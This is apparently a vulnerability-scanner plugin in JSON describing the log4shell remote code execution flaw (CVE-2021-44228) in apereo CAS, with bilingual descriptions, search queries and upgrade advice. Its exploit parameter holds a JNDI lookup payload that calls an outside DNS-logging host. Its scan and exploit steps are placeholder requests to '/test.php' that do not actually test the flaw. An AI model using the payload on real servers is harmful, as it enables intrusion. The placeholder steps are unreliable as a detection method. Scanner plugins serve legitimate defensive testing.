apereo CAS is an open source enterprise multilingual single sign-on solution for the Web.
apereo CAS has a log4shell RCE vulnerability. Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.
", "Product": "apereo CAS", "Homepage": "https://github.com/apereo/cas", "DisclosureDate": "2021-12-22", "Author": "keeeee", "FofaQuery": "app=\"apereo-CAS\"", "GobyQuery": "app=\"apereo-CAS\"", "Level": "3", "Impact": "Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.
", "Recommendation": "The supplier has released a solution, please upgrade to the new version:https://apereo.github.io/2021/12/11/log4j-vuln/
1. Deploy a web application firewall to monitor database operations.
2.If not necessary, prohibit public network access to the system.
", "Translation": { "CN": { "Name": "apereo CAS log4shell 命令执行漏洞(CVE-2021-44228)", "Product": "apereo CAS", "VulType": [ "命令执行" ], "Tags": [ "命令执行" ], "Description": "apereo CAS 是一个开源的用于 Web 的企业多语言单点登录解决方案。
apereo CAS 存在 log4shell RCE 漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
⼚商已发布了漏洞方案,请及时关注: https://apereo.github.io/2021/12/11/log4j-vuln/
1、通过防⽕墙等安全设备设置访问策略,设置⽩名单访问。
2、如⾮必要,禁⽌公⽹访问该系统。
" } }, "References": [ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228", "https://nvd.nist.gov/vuln/detail/CVE-2021-44228", "https://apereo.github.io/2021/12/11/log4j-vuln/" ], "HasExp": true, "ExpParams": [ { "name": "dnslog", "type": "input", "value": "${jndi:ldap://${hostName}.xxx.dnslog.cn}" } ], "ExpTips": null, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Tags": [ "rce" ], "VulType": [ "rce" ], "CVEIDs": [ "CVE-2021-44228" ], "CVSSScore": "10.0", "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null }, "CNNVD": [ "CNNVD-202112-799" ], "CNVD": [ "CNVD-2021-95914" ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/test.php", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "test", "bz": "" } ] }, "SetVariable": [] } ], "Is0day": false }